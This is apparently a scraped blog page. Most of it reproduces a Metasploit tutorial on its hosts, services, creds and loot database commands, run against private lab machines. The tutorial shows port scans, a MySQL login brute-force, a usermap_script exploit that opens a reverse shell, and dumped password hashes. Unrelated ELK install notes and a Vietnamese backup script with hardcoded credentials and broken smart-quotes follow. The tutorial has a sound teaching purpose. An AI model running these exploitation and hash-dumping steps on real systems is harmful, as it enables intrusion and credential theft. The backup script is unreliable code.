We’ll start by asking the ‘hosts‘ command to display only the IP address and OS type using the ‘-c‘ switch.

msf > hosts -c address,os_flavor

Hosts
=====

address     os_flavor
-------     ---------
172.16.194.134 XP
172.16.194.172 Ubuntu

Setting up Modules

Another interesting feature available to us, is the ability to search all our entries for something specific. Imagine if we wished to find only the Linux based machines from our scan. For this we’d use the ‘-S‘ option. This option can be combined with our previous example and help fine tune our results.

msf > hosts -c address,os_flavor -S Linux

Hosts
=====

address     os_flavor
-------     ---------
172.16.194.172 Ubuntu

msf >

Using the output of our previous example, we’ll feed that into the ‘tcp’ scan auxiliary module.

msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

  Name     Current Setting Required Description
  ----     --------------- -------- -----------
  CONCURRENCY 10        yes    The number of concurrent ports to check per host
  FILTER            no    The filter string for capturing traffic
  INTERFACE           no    The name of the interface
  PCAPFILE           no    The name of the PCAP capture file to process
  PORTS    1-10000     yes    Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS            yes    The target address range or CIDR identifier
  SNAPLEN   65535      yes    The number of bytes to capture
  THREADS   1        yes    The number of concurrent threads
  TIMEOUT   1000       yes    The socket connect timeout in milliseconds

We can see by default, nothing is set in ‘RHOSTS‘, we’ll add the ‘-R‘ switch to the hosts command and run the module. Hopefully it will run and scan our target without any problems.

msf auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R

Hosts
=====

address     os_flavor
-------     ---------
172.16.194.172 Ubuntu

RHOSTS => 172.16.194.172

msf auxiliary(tcp) > run

[*] 172.16.194.172:25 - TCP OPEN
[*] 172.16.194.172:23 - TCP OPEN
[*] 172.16.194.172:22 - TCP OPEN
[*] 172.16.194.172:21 - TCP OPEN
[*] 172.16.194.172:53 - TCP OPEN
[*] 172.16.194.172:80 - TCP OPEN

...snip...

[*] 172.16.194.172:5432 - TCP OPEN
[*] 172.16.194.172:5900 - TCP OPEN
[*] 172.16.194.172:6000 - TCP OPEN
[*] 172.16.194.172:6667 - TCP OPEN
[*] 172.16.194.172:6697 - TCP OPEN
[*] 172.16.194.172:8009 - TCP OPEN
[*] 172.16.194.172:8180 - TCP OPEN
[*] 172.16.194.172:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Of course this also works if our results contain more than one address.

msf auxiliary(tcp) > hosts -R

Hosts
=====

address     mac        name os_name      os_flavor os_sp purpose info comments
-------     ---        ---- -------      --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB    Microsoft Windows XP        server     
172.16.194.172 00:0C:29:D1:62:80    Linux       Ubuntu      server     

RHOSTS => 172.16.194.134 172.16.194.172

msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

  Name     Current Setting        Required Description
  ----     ---------------        -------- -----------
  CONCURRENCY 10               yes    The number of concurrent ports to check per host
  FILTER                   no    The filter string for capturing traffic
  INTERFACE                  no    The name of the interface
  PCAPFILE                  no    The name of the PCAP capture file to process
  PORTS    1-10000            yes    Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS    172.16.194.134 172.16.194.172 yes    The target address range or CIDR identifier
  SNAPLEN   65535             yes    The number of bytes to capture
  THREADS   1               yes    The number of concurrent threads
  TIMEOUT   1000              yes    The socket connect timeout in milliseconds

You can see how useful this may be if our database contained hundreds of entries. We could search for Windows machines only, then set the RHOSTS option for the smb_version auxiliary module very quickly. The set RHOSTS switch is available in almost all of the commands that interact with the database.

Services

Another way to search the database is by using the ‘services‘ command. Like the previous examples, we can extract very specific information with little effort.

 
msf > services -h

Usage: services [-h] [-u] [-a] [-r ] [-p >port1,port2>] [-s >name1,name2>] [-o ] [addr1 addr2 ...]

 -a,--add     Add the services instead of searching
 -d,--delete    Delete the services instead of searching
 -c <col1,col2>  Only show the given columns
 -h,--help     Show this help information
 -s <name1,name2> Search for a list of service names
 -p <port1,port2> Search for a list of ports
 -r   Only show [tcp|udp] services
 -u,--up      Only show services which are up
 -o     Send output to a file in csv format
 -R,--rhosts    Set RHOSTS from the results of the search
 -S,--search    Search string to filter by

Available columns: created_at, info, name, port, proto, state, updated_at

Much in the same way as the hosts command, we can specify which fields to be displayed. Coupled with the ‘-S‘ switch, we can also search for a service containing a particular string.

msf > services -c name,info 172.16.194.134

Services
========

host      name     info
----      ----     ----
172.16.194.134 http     Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.134 msrpc     Microsoft Windows RPC 
172.16.194.134 netbios-ssn  
172.16.194.134 http     Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.134 microsoft-ds Microsoft Windows XP microsoft-ds 
172.16.194.134 mysql 

Here we are searching all hosts contained in our database with a service name containing the string ‘http’.

msf > services -c name,info -S http

Services
========

host      name info
----      ---- ----
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.172 http Apache httpd 2.2.8 (Ubuntu) DAV/2 
172.16.194.172 http Apache Tomcat/Coyote JSP engine 1.1 

The combinations for searching are enormous. We can use specific ports, or port ranges. Full or partial service name when using the ‘-s’ or ‘-S’ switches. For all hosts or just a select few… The list goes on and on. Here are a few examples, but you may need to experiment with these features in order to get what you want and need out your searches.

msf > services -c info,name -p 445

Services
========

host      info                 name
----      ----                 ----
172.16.194.134 Microsoft Windows XP microsoft-ds   microsoft-ds
172.16.194.172 Samba smbd 3.X workgroup: WORKGROUP  netbios-ssn


msf > services -c port,proto,state -p 70-81
Services
========
host      port proto state
----      ---- ----- -----
172.16.194.134 80  tcp  open
172.16.194.172 75  tcp  closed
172.16.194.172 71  tcp  closed
172.16.194.172 72  tcp  closed
172.16.194.172 73  tcp  closed
172.16.194.172 74  tcp  closed
172.16.194.172 70  tcp  closed
172.16.194.172 76  tcp  closed
172.16.194.172 77  tcp  closed
172.16.194.172 78  tcp  closed
172.16.194.172 79  tcp  closed
172.16.194.172 80  tcp  open
172.16.194.172 81  tcp closed

msf > services -s http -c port 172.16.194.134
Services
========
host      port
----      ----
172.16.194.134 80
172.16.194.134 443

msf > services -S Unr
Services
========
host      port proto name state info
----      ---- ----- ---- ----- ----
172.16.194.172 6667 tcp  irc open Unreal ircd
172.16.194.172 6697 tcp  irc open Unreal ircd

CSV Export

Both the hosts and services commands give us a means of saving our query results into a file. The file format is a comma separated value, or CSV. Followed by the ‘-o’ with path and filename, the information that has been displayed on the screen at this point will now be saved to disk.

msf > services -s http -c port 172.16.194.134 -o /root/msfu/http.csv

[*] Wrote services to /root/msfu/http.csv

msf > hosts -S Linux -o /root/msfu/linux.csv
[*] Wrote hosts to /root/msfu/linux.csv

msf > cat /root/msfu/linux.csv
[*] exec: cat /root/msfu/linux.csv

address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments
"172.16.194.172","00:0C:29:D1:62:80","","Linux","Debian","","server","",""

msf > cat /root/msfu/http.csv
[*] exec: cat /root/msfu/http.csv

host,port
"172.16.194.134","80"
"172.16.194.134","443"

Creds

The ‘creds’ command is used to manage found and used credentials for targets in our database. Running this command without any options will display currently saved credentials.

msf > creds

Credentials
===========

host port user pass type active?
---- ---- ---- ---- ---- -------

[*] Found 0 credentials.

As with ‘db_nmap‘ command, successful results relating to credentials will be automatically saved to our active workspace. Let’s run the auxiliary module ‘mysql_login‘ and see what happens when Metasploit scans our server.

msf auxiliary(mysql_login) > run

[*] 172.16.194.172:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 172.16.194.172:3306 MYSQL - [1/2] - Trying username:'root' with password:''
[*] 172.16.194.172:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf auxiliary(mysql_login) > creds 

Credentials
===========

host      port user pass type   active?
----      ---- ---- ---- ----   -------
172.16.194.172 3306 root    password true

[*] Found 1 credential.
msf auxiliary(mysql_login) >

We can see the module was able to connect to our mysql server, and because of this Metasploit saved the credentials in our database automatically for future reference.

During post-exploitation of a host, gathering user credentials is an important activity in order to further penetrate a target network. As we gather sets of credentials, we can add them to our database with the ‘creds -a’ command.

msf > creds -a 172.16.194.134 -p 445 -u Administrator -P 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: 2012-06-20 20:31:42 UTC Credential: host=172.16.194.134 port=445 proto=tcp sname= type=password user=Administrator pass=7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true

msf > creds

Credentials
===========

host      port user      pass                                 type   active?
----      ---- ----      ----                                 ----   -------
172.16.194.134 445  Administrator 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: password true

[*] Found 1 credential.


Loot

Once you’ve compromised a system (or three), one of the objective may be to retrieve hash dumps. From either a Windows or *nix system. In the event of a successful hash dump, this information will be stored in our database. We can view this dumps using the ‘loot’ command. As with almost every command, adding the ‘-h’ switch will display a little more information.

msf > loot -h
Usage: loot
 Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
 Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]
 Del: loot -d [addr1 addr2 ...]

 -a,--add     Add loot to the list of addresses, instead of listing
 -d,--delete    Delete *all* loot matching host and type
 -f,--file     File with contents of the loot to add
 -i,--info     Info of the loot to add
 -t <type1,type2> Search for a list of types
 -h,--help     Show this help information
 -S,--search    Search string to filter by

Here’s an example of how one would populate the database with some ‘loot’.

msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4uGPYOrars5OojdL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4uGPYOrars5OojdL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:55138) at 2012-06-27 19:38:54 -0400

^Z
Background session 1? [y/N] y

msf exploit(usermap_script) > use post/linux/gather/hashdump
msf post(hashdump) > show options

Module options (post/linux/gather/hashdump):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  SESSION 1        yes    The session to run this module on.

msf post(hashdump) > sessions -l

Active sessions
===============

 Id Type    Information Connection
 -- ----    ----------- ----------
 1  shell unix        172.16.194.163:4444 -> 172.16.194.172:55138 (172.16.194.172)

msf post(hashdump) > run

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
[*] Post module execution completedmsf post(hashdump) > loot

Loot
====

host      service type     name          content   info              path
----      ------- ----     ----          -------   ----              ----
172.16.194.172      linux.hashes unshadowed_passwd.pwd text/plain Linux Unshadowed Password File /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
172.16.194.172      linux.passwd passwd.tx       text/plain Linux Passwd File        /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.passwd_953644.txt
172.16.194.172      linux.shadow shadow.tx       text/plain Linux Password Shadow File   /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.shadow_492948.txt

Install Elasticsearch, Logstash, and Kibana (ELK Stack) on CentOS/RHEL 7

 Uncategorized  Comments Off on Install Elasticsearch, Logstash, and Kibana (ELK Stack) on CentOS/RHEL 7
May 052018
 
rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch

/etc/yum.repos.d/elasticsearch.repo

[elasticsearch-6.x]
name=Elasticsearch repository for 6.x packages
baseurl=https://artifacts.elastic.co/packages/6.x/yum
gpgcheck=1
gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
enabled=1
autorefresh=1
type=rpm-md

yum install elasticsearch

config 
curl -X GET http://localhost:9200

Logstash

rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch

cat << EOF > /etc/yum.repos.d/logstash.repo
[logstash-6.x]
name=Elastic repository for 6.x packages
baseurl=https://artifacts.elastic.co/packages/6.x/yum
gpgcheck=1
gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
enabled=1
autorefresh=1
type=rpm-md
EOF
yum install logstash

Install Kibana 

rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch

cat <<EOF > /etc/yum.repos.d/kibana.repo
[kibana-6.x]
name=Kibana repository for 6.x packages
baseurl=https://artifacts.elastic.co/packages/6.x/yum
gpgcheck=1
gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
enabled=1
autorefresh=1
type=rpm-md
EOF

yum install kibana

		

Tự động backup dữ liệu, mã nguồn lên git

 Linux  Comments Off on Tự động backup dữ liệu, mã nguồn lên git
Feb 022018
 

Chào các bạn,

Công việc hàng ngày backup cơ sở dữ liệu, mã nguồn khá mất công. Tôi thử viết một đoạn sau để thực hiện backup dữ liệu mã mã nguồn của tôi lên git. Các bạn tham khảo đoạn code sau:

#!/bin/bash

# Database credentials
user=”asianux_user”
password=”asianux”
host=”localhost”
db_name=”db”

# Other options
backup_path=”/home/asianux/db”
date=$(date +”%d-%b-%Y”)

# Set default file permissions
umask 177

# Dump database into SQL file
mysqldump –user=$user –password=$password –host=$host $db_name > $backup_path/$db_name-$date.sql

# Delete files older than 30 days
find $backup_path/* -mtime +30 -exec rm {} \;

# Push to git backup code and db
sleep 10
cd /var/asianux
git add .
git commit -m “Auto Commit Asianux”
git push origin master
echo “Backup code and db finish! Goodluck”

Sau đó bạn thiết lập chạy crontab để chạy tự động.